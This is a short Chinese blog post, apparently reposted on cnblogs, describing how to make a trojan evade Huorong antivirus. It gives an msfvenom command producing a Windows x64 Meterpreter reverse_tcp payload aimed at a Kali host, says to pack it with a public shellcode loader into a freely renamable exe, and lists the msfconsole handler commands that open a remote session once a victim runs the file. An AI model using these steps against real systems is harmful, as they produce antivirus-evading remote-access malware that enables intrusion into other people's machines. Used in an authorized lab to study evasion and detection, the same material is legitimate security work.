Shellcodeloader免杀过火绒

 


作者:@11阳光
本文为作者原创,转载请注明出处:https://www.cnblogs.com/sunny11/p/14105624.html


题记

        今天脑子里面蹦出来个想法,免杀木马然后cs上线,本来想让cs与msf联动的,但是出了点小问题,还是先研究免杀火绒吧。

环境

        Kali:192.168.0.119 win10:192.168.0.200

        工具地址:https://github.com/knownsec/shellcodeloader

步骤

1、在kali生成3.bin木马。

        msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.119 lport=4444 -f raw -o 3.bin

2、把木马移到工具上做免杀。

生成loder.exe软件,可随意改名,运行就能上线。

3、kali开启监听。

        msfconsole

        use exploit/multi/handler

        set payload windows/x64/meterpreter/reverse_tcp

        set lhost 192.168.0.119

        exploit

        然后运行exe

        上线

4、火绒检测

        软件运行后检测。

 
分类: 杂七杂八
1
0
 
« 上一篇: C#创建快捷方式-转载自ConExpress
» 下一篇: Web安全测试学习笔记-DVWA-盲注(使用sqlmap)
posted @ 

 
posted @   hack747  阅读(376)  评论(0编辑  收藏  举报
编辑推荐:
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)
点击右上角即可分享
微信分享提示